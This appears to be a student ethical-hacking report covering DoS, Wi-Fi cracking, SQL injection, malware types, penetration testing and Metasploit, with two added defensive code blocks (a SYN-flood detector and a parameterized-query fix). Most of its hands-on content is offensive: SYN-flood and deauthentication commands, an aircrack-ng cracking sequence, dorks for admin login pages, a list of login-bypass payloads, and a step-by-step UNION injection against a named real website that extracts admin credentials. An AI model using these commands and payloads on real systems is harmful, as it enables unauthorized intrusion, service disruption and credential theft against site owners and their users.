A "denial-of-service" attack is characterized by an explicit attempt by attackers to
prevent legitimate users of a service from using that service. Examples include:
 attempts to "flood" a network, thereby preventing legitimate network traffic;
 attempts to disrupt connections between two machines, thereby preventing
access to a service;
 attempts to prevent a particular individual from accessing a service;
 attempts to disrupt service to a specific system or person.

It is an attempt to make a machine or network resource unavailable to its intended
users by consuming all the resources available to them, such as network bandwidth or
any type of memory.
 Ping Of Death
o ping -t -l 6550 google.com [ max buffer size = 65500 ]
o Effective system [ Solaris 2.4 , minix , win3.11,95 ]
 SYN-ATTACK
o Hping -i sudo hping3 -i u1 -S -p 80 192.168.1.1
 UDP/HTTP/TCP Flooding
o LOIC
o HOIC
 Smurf Attack
o make your own packet and flood on network
 pktbuilder
 packETH 1.6 (linux & windows)
 CDP Flooding (Cisco Discovery Protocol)
o yersinia [ backtrack ]
o Done on Cisco Switches & Routers
 MAC Flooding
o Flooding network switches
o ARP Spoofing
o Net cut [ Windows ]
o ettercap [ Backtrack ]
o Deauthentication Technique
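As an added defender-side example (not part of the original report), the SYN flood listed above (hping3 -S -p 80) leaves a signature in packet captures: many bare SYNs from a source that never completes the handshake. The tcpdump-style lines below are constructed, and the threshold values are assumptions rather than tuned defaults.

```python
"""SYN-flood indicator over tcpdump-style lines (added example, not from the report).

A source that sends many bare SYNs to a port but never follows up with an ACK
(the third handshake step) is flooding rather than connecting. The log lines
below are constructed; the threshold values are assumptions, not tuned defaults.
"""
import re
from collections import defaultdict

# Default tcpdump line: 'HH:MM:SS.ffffff IP src.sport > dst.dport: Flags [..], ...'
LINE_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > "
    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\]"
)

def parse_line(line):
    """Return a dict of ts/src/sport/dst/dport/flags, or None for non-TCP lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    pkt = m.groupdict()
    pkt["sport"], pkt["dport"] = int(pkt["sport"]), int(pkt["dport"])
    return pkt

def syn_flood_sources(lines, dport=80, syn_threshold=20, max_ack_ratio=0.1):
    """Map each suspect source to (bare_syn_count, ack_packet_count).

    A source is a suspect when it sent at least syn_threshold bare SYNs to dport
    and its ACK-bearing packets to dport are at most max_ack_ratio of that count;
    a legitimate client sends at least one ACK for every connection it opened.
    """
    syns, acks = defaultdict(int), defaultdict(int)
    for line in lines:
        pkt = parse_line(line)
        if pkt is None or pkt["dport"] != dport:
            continue
        flags = pkt["flags"]
        if flags == "S":                         # bare SYN: handshake step 1
            syns[pkt["src"]] += 1
        elif "." in flags and "S" not in flags:  # '.' = ACK bit (step 3, data, FIN)
            acks[pkt["src"]] += 1
    return {
        src: (n, acks[src])
        for src, n in syns.items()
        if n >= syn_threshold and acks[src] <= n * max_ack_ratio
    }

# Constructed sample: one normal client on 192.168.1.50, one flooder on 10.0.0.99.
SAMPLE_LOG = [
    "12:00:00.000100 IP 192.168.1.50.51000 > 192.168.1.1.80: Flags [S], seq 1, win 64240, length 0",
    "12:00:00.000300 IP 192.168.1.1.80 > 192.168.1.50.51000: Flags [S.], seq 9, ack 2, win 65160, length 0",
    "12:00:00.000500 IP 192.168.1.50.51000 > 192.168.1.1.80: Flags [.], ack 10, win 502, length 0",
    "12:00:00.000700 IP 192.168.1.50.51000 > 192.168.1.1.80: Flags [P.], seq 2:80, ack 10, win 502, length 78",
] + [
    f"12:00:01.{i:06d} IP 10.0.0.99.{40000 + i} > 192.168.1.1.80: Flags [S], seq {i}, win 512, length 0"
    for i in range(25)
]

if __name__ == "__main__":
    for src, (n_syn, n_ack) in syn_flood_sources(SAMPLE_LOG).items():
        print(f"possible SYN flood from {src}: {n_syn} bare SYNs, {n_ack} ACKs")
```

On a real capture the same check is run over the output of tcpdump -n, and a spoofed-source flood shows up as many distinct sources each just under the threshold, so the per-port total is worth watching as well.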

2. Ddos Attack
DDOS, short for Distributed Denial of Service, is a type of DOS attack where
multiple compromised systems -- which are usually infected with a Trojan -- are
used to target a single system causing a Denial of Service (DoS) attack. Victims of
a DDoS attack consist of both the end targeted system and all systems maliciously
used and controlled by the hacker in the distributed attack.
According to this report on e-Security Planet, in a DDoS attack, the incoming
traffic flooding the victim originates from many different sources – potentially
hundreds of thousands or more. This effectively makes it impossible to stop the
attack simply by blocking a single IP address; plus, it is very difficult to distinguish
legitimate user traffic from attack traffic when spread across so many points of
origin.
Distribution of attack techniques: January 2013

Distribution of attack techniques: April 2013


Wireless hacking

Wireless networks broadcast their packets using radio frequency or optical
wavelengths. A modern laptop computer can listen in. Worse, an attacker can
manufacture new packets on the fly and persuade wireless stations to accept his
packets as legitimate.
The step by step procedure in wireless hacking can be explained with the help of
the following topics:
1. Stations and Access Points :- A wireless network interface card (adapter) is
a device, called a station, providing the network physical layer over a radio
link to another station. An access point (AP) is a station that provides frame
distribution service to stations associated with it. The AP itself is typically
connected by wire to a LAN. Each AP has a 0 to 32 byte long Service Set
Identifier (SSID) that is also commonly called a network name. The SSID is
used to segment the airwaves for usage.
2. Channels :- The stations communicate with each other using radio
frequencies between 2.4 GHz and 2.5 GHz. Neighboring channels are only 5
MHz apart. Two wireless networks using neighboring channels may
interfere with each other.
3. Wired Equivalent Privacy (WEP) :- It is a shared-secret key encryption
system used to encrypt packets transmitted between a station and an AP. The
WEP algorithm is intended to protect wireless communication from
eavesdropping. A secondary function of WEP is to prevent unauthorized
access to a wireless network. WEP encrypts the payload of data packets.
Management and control frames are always transmitted in the clear. WEP
uses the RC4 encryption algorithm.
4. Wireless Network Sniffing :- Sniffing is eavesdropping on the network. A
(packet) sniffer is a program that intercepts and decodes network traffic
broadcast through a medium. It is easier to sniff wireless networks than
wired ones. Sniffing can also help find the easy kill as in scanning for open
access points that allow anyone to connect, or capturing the passwords used
in a connection session that does not even use WEP, or in telnet, rlogin and
ftp connections.
Steps for hacking Wi-Fi:
 airmon-ng start wlan0
 airodump-ng mon0
 airodump-ng --bssid 0C:D2:B5:01:AB:70 -c 12 -w bytecodelab mon0
 aireplay-ng -c <STATION> -0 500 -a 0C:D2:B5:01:AB:70 mon0
 aircrack-ng bytecodelab.cap
Sql Injection

1. What is Sql injection attack?
A SQL Injection attack is a form of attack that comes from user input that has not
been checked to see that it is valid. The objective is to fool the database system
into running malicious code that will reveal sensitive information or otherwise
compromise the server.
SQL injection is a technique used to take advantage of non-validated input
vulnerabilities to pass SQL commands through a Web application for execution by
a backend database. Attackers take advantage of the fact that programmers often
chain together SQL commands with user-provided parameters, and can therefore
embed SQL commands inside these parameters. The result is that the attacker can
execute arbitrary SQL queries and/or commands on the backend database server
through the Web application.

1. MYSQL Injection
 Dorks Code
o inurl:admin.asp
o inurl:login/admin.asp
o inurl:admin/login.asp
o inurl:adminlogin.asp
o inurl:adminhome.asp
o inurl:admin_login.asp
o inurl:administrator_login.asp

I am going to use:
Code:
http://site.com/Admin_Login.asp

 Logging in
Now you can find some sites with these dorks and try to log in with:
Username: Admin
Password: password' or 1=1--
Instead of password' or 1=1 you can use some of these:
Code:
'or'1'='1
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
'or'1=1'

The password ' or 1=1 will confuse the server and let you log in.
So if you are able to log in, the site is vulnerable and you are going to be able to
use the admin panel.
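Why the login above falls over, and what the fix looks like, as an added example that is not part of the original report: the vulnerable function builds the query by string concatenation exactly as described in the introduction, and the safe one passes the same input as a bound parameter. The in-memory SQLite table and its single account are constructed for the demo.

```python
"""Login bypass via string-built SQL, beside the parameterized fix.

Added example, not from the original report. The users table below is
constructed for the demo (a real system stores password hashes, not plaintext);
the payloads tried in the test are the ones listed in the report.
"""
import sqlite3

def make_db():
    """Constructed demo database with one account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('Admin', 'S3cret!')")
    conn.commit()
    return conn

def vulnerable_login(conn, username, password):
    """User input is concatenated into the SQL text.

    With password = "password' or 1=1--" the query becomes
      SELECT id FROM users WHERE username = 'Admin' AND password = 'password' or 1=1--'
    The quote in the input closes the string, 'or 1=1' makes the WHERE clause true
    for every row, and '--' comments out the dangling quote.
    """
    query = ("SELECT id FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None

def safe_login(conn, username, password):
    """Parameterized query: the driver sends the values separately from the SQL
    text, so quotes and comment markers inside them are just characters to match."""
    query = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None

if __name__ == "__main__":
    db = make_db()
    payload = "password' or 1=1--"
    print("vulnerable:", vulnerable_login(db, "Admin", payload))  # True
    print("safe:      ", safe_login(db, "Admin", payload))        # False
```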

2. Advanced Sql injection
Example of advanced SQL injection:
Target : http://www.naukriguru.com
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 100
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 10
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 20
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 50
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 40
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 30
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 35
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 33
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 32
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 31
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 union select by
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 union select by
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31—
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31—
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31—
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
,30,31—
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,group_concat,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2
9,30,31—
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2
5,26,27,28,29,30,31—
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2
5,26,27,28,29,30,31—
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,
25,26,27,28,29,30,31 from information_schema.tables where table_schema =
database()—
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,
24,25,26,27,28,29,30,31 from information_schema.columns where table_name =
0x6e675f61646d696e—
 http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,group_concat(id,0x3a,loginid,0x3a,email,0x3a,password,0x3a,name,0x3a,type,0x3a),
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from
ng_admin—
 http://www.naukriguru.com/admin/
 http://www.naukriguru.com/admin/index.php#
 http://www.naukriguru.com/admin/add_industry.php
Tools used for SQL injection are:
 Havij v1.15
 Sql map
 Bsql hacker
 Pangolin
 Absinthe
Malware

This is a big catchall phrase that covers all sorts of software with nasty intent. Not
buggy software, not programs you don’t like, but software which is specifically
written with the intent to harm.
Virus:
This is a specific type of malware that spreads itself once it’s initially run. It’s
different from other types of malware because it can either be like a parasite that
attaches to good files on your machine, or it can be self-contained and search out
other machines to infect.
Worm:
Think of inchworms rather than tapeworms. These are not parasitic worms, but the
kind that move around on their own. In the malware sense, they’re viruses that are
self-contained (they don’t attach themselves like a parasite) and go around
searching out other machines to infect.
Trojan:
Do you remember that story you had to read in high school about the big wooden
horse that turned out to be full of guys with spears? This is the computer
equivalent. You run a file that is supposed to be something fun or important, but it
turns out that it’s neither fun nor important, and it’s now doing nasty things to your
machine.
Penetration Testing

Introduction:

1. What is penetration testing?
A penetration test is a method of evaluating the security of a computer
system or a network by simulating an attack from a malicious source, known
as a black hat hacker or cracker. The process involves an active analysis of
the system for any potential vulnerabilities that may result from poor or
improper system configuration, known and/or unknown hardware or
software flaws, or operational weaknesses in process or technical
countermeasures.

2. Why conduct a penetration test?
From a business perspective, penetration testing helps safeguard your
organization against failure, through:
 Preventing financial loss through fraud or through lost revenue due to
unreliable business system and processes.
 Proving due diligence and compliance to your industry regulators,
customers and shareholders.
 Protecting your brand by avoiding loss of consumer confidence and
business reputation.
3. What can be tested?
All parts where an organization captures, stores and processes information can
be assessed: the systems where the information is stored, the transmission
channels that transport it, and the processes and personnel that manage it.
Examples of areas that are commonly tested are:
 Operating systems, applications, databases, networking equipment etc.
 Dynamic websites, in-house applications etc.
 Telephony (war-dialing, remote access etc.)
 Personnel (screening process, social engineering etc.)
 Physical (access controls, dumpster diving etc.)
 Wireless (wifi, Bluetooth, IR, GSM, RFID etc.)

4. What is the process of penetration testing?
Penetration testing also has a vulnerability assessment part. In a pen test we
launch attacks, whereas in a VA (vulnerability assessment) we only test for
vulnerabilities with automated VA tools like Nikto, Nessus, Acunetix etc.
Steps of advanced penetration testing:
[Diagram: Penetration Testing, split into Automated (VA by tools) and Manual
(using Metasploit)]
1. If we want to do a pen test on any website, like www.anysite.com, we need
DNS records from robtex.com, whois records and other types of
information; this part is known as Information Gathering.
2. After that we use the BackTrack operating system (also known as the
pen-testing OS for security experts) toolkit for automated pen-testing with
the help of free tools like: Nikto, Privoxy, Nessus, Samurai etc.
3. Make a report for all found vulnerabilities and cross-verify.
4. Use commercial software like:
Core Impact, Canvas, QualysGuard, Xcobra, NTOSpider, KSES,
AppScan, WebInspect, Burp Suite, Acunetix WVS etc.
5. Make a report for new vulnerabilities.
6. After that we start manual pen-testing with the help of Metasploit and
reverse engineering tools.
7. Find vulnerabilities and take screenshots for Proof-Of-Concept; create a
custom report.
8. Forward the custom report to the company.
Metasploit

1. What is Metasploit?
The Metasploit project is an open-source computer security project which
provides information about security vulnerabilities and aids in penetration
testing and IDS signature development. Its most well-known sub-project is the
Metasploit framework, a tool for developing and executing exploit code
against a remote target machine. Other important sub-projects include the
opcode database, shellcode archive, and security research. Metasploit is one of
the best hacking frameworks for local and remote hacking done in an easy way.

Metasploit Terms:
Exploit: to take advantage of a security flaw within a system, network, or
application.
Payload: code that the Metasploit framework has the victim computer execute.
Module: a small piece of code that can be added to the Metasploit framework
to execute an attack.
Shell-code: a small piece of code used as a payload.

MSFconsole:
MSFconsole is an all-in-one interface to most of the features in Metasploit.
MSFconsole can be used to launch attacks, create listeners, and much, much
more. Metasploit comes installed by default on BackTrack 5. To access
MSFconsole, open your console and type:
root@bt:~# cd /opt/framework3/msf3/
root@bt:/opt/framework3/msf3# msfconsole
After some time, the msfconsole will boot.
Or you can directly use the "msfconsole" command to open Metasploit.

What can we do with Metasploit?
 We can hack all platforms of Windows, Linux, Sun Solaris, AIX etc.
 We can hack any remote machine through the available exploits in Adobe
Acrobat 9.0.0.0, 8.1.1, Winamp, RealPlayer, Oracle, Mozilla, IE, Yahoo
Messenger.
 We can create undetectable VIRUSes in exe, java, pdf, mp3 etc. formats.
 We can sniff network traffic and sessions for email passwords, SSL
protection and data protection.
 We can install a key logger on a remote machine, record audio etc.

Msfconsole Commands:
1. show: Entering 'show' at the msfconsole prompt will display every
module within Metasploit. There are a number of 'show' commands
you can use but the ones you will use most frequently are 'show
auxiliary', 'show exploits', 'show payloads', 'show encoders'.
show targets: shows the targets of a particular exploit.
show options: shows the various options of an exploit.
show advanced: shows the advanced options of an exploit.
show payloads: lists all payloads.
show exploits: lists all exploits.
show auxiliary: lists all auxiliary modules.

2. use: When you have decided on a particular module to make use
of, issue the 'use' command to select it. The 'use' command changes
your context to a specific module, exposing type-specific commands.
Notice in the output below that any global variables that were
previously set are already configured.
3. set: The 'set' command allows you to configure Framework
options and parameters for the current module you are working
with.

4. unset: The opposite of the 'set' command, of course, is 'unset'.
'Unset' removes a parameter previously configured with 'set'. You
can remove all assigned variables with 'unset all'.

5. back: Once you have finished working with a particular module,
or if you inadvertently select the wrong module, you can issue the
'back' command to move out of the current context. This, however, is
not required. Just as you can in commercial routers, you can switch
modules from within other modules. As a reminder, variables will
only carry over if they are set globally.

6. check: There aren't many exploits that support it, but there is also
a 'check' option that will check to see if a target is vulnerable to a
particular exploit instead of actually exploiting it.

7. info: The 'info' command will provide detailed information about
a particular module including all options, targets, and other
information. Be sure to always read the module description prior to
using it as some may have undesired effects.
The info command also provides the following information:
The author and licensing information
Vulnerability references (ie: CVE, BID, etc)
Any payload restrictions the module may have

8. search: The msfconsole includes an extensive regular-expression
based search functionality. If you have a general idea of what you
are looking for you can search for it via 'search '. In the output
below, a search is being made for MS Bulletin MS09-011. The search
function will locate this string within the module names,
descriptions, references, etc.
9. sessions: The 'sessions' command allows you to list, interact with,
and kill spawned sessions. The sessions can be shells, Meterpreter
sessions, VNC, etc.
sessions -l: to list any active sessions.
sessions -i: to interact with a given session, you just need to use the '-i'
switch followed by the Id number of the session.
Reason for choosing CEH

1. Companies started taking Information Security seriously.
2. Salary is good.
3. The field is diverse.
4. I will never be unemployed.
5. I have an opportunity to interact with everyone in the company.
6. I will set the rules (and also have the power to break them).
7. Being a security professional is cool… or at least people think it is.
Gantt chart
Bibliography

 http://anti-virus-software-review.toptenreviews.com/
